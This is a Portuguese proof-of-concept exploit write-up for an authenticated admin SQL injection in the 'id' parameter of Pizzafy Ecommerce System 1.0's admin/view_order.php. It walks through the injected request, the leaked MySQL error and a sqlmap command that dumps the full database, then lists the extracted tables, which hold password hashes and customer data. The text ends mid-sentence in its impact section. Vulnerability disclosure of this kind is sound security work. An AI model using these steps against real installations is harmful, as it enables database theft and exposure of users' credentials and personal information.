
Exploit de prova de conceito para CVE-2026-7394, uma vulnerabilidade de injeção SQL no SourceCodester Pizzafy Ecommerce System 1.0. Demonstra SQLi autenticado de admin através do parâmetro `id` em `admin/view_order.php`, permitindo despejo completo do banco de dados incluindo credenciais de usuário e PII.
admin/view_order.php| Campo | Valor |
|---|---|
| Fornecedor | SourceCodester |
| Produto | Pizzafy Ecommerce System usando PHP e MySQL |
| Versão | 1.0 |
| Vulnerabilidade | SQL Injection |
| CWE | CWE-89 |
| Pontuação CVSSv3 | 7.2 (Alta) |
| Vetor de Ataque | Rede |
| Autenticação Necessária | Sim (Administrador) |
| Pesquisador | Xmyronn |
| Data | 2026-04-11 |
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
Arquivo: Pizzafy/admin/view_order.php
Parâmetro: id (GET)
O endpoint admin/view_order.php no Pizzafy Ecommerce System 1.0 não sanitiza adequadamente o parâmetro GET id antes de passá-lo para uma consulta MySQL. Um administrador autenticado pode manipular este parâmetro para injetar SQL arbitrário, levando ao comprometimento total do banco de dados.
Navegue para:
http://localhost/pizzafy/Pizzafy/admin/index.php
Faça login com credenciais de administrador.
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Clique em Ver Pedido em qualquer entrada de pedido.

A requisição GET interceptada se parece com:

Modifique id=1 para id=':

GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
Resposta — Erro MySQL exposto:
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
Salve a requisição em view_order.txt e execute:
sqlmap -r view_order.txt --dump --batch
sqlmap confirmou tipos de injeção:
| Tipo | Título |
|---|---|
| Cego baseado em booleano | AND cego baseado em booleano — cláusula WHERE |
| Baseado em erro | MySQL >= 5.0 FLOOR baseado em erro |
| Cego baseado em tempo | MySQL >= 5.0.12 SLEEP |
| Consulta UNION | Consulta UNION genérica — 11 colunas |
Banco de dados completo extraído:
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
Dados sensíveis expostos incluem hashes de senhas bcrypt, e-mails de clientes, detalhes de pedidos e configuração do sistema.
Um administrador autenticado malicioso (ou atacante que obteve credenciais de admin) pode: